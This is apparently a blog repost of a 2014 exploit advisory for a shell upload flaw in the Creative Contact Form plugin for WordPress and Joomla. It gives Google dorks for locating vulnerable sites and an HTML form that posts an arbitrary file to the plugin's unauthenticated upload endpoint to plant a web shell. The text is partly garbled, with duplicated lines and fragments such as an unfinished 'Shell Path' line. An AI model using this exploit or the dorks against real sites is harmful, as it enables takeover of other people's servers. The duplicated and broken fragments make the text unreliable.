#- Title: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability
#- Author: Vulnerability discovered by Gianni Angelozzi
Exploit written by Claudio Viviani
Exploit written by Claudio Viviani
#- Date: 2014-10-25
#- Developer : creative-solutions .net
#- Link Download : creative-solutions .net/joomla/creative-contact-form
creative-solutions .net/wordpress/creative-contact-form
#- Google Dork: inurl:"/sexy-contact-form/" (wordpress )
inurl:com_creativecontactform ( joomla )
#- Fixed in Version : wp > 0.9.7 Joomla>2.0.0
#- Tested on : Backbox
===================================================
-- Proof Of Concept --
When Vuln : {"files":
CSRF :
<form method="POST" action="http://target. com/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
Shell Path : Here
Tidak ada komentar:
Posting Komentar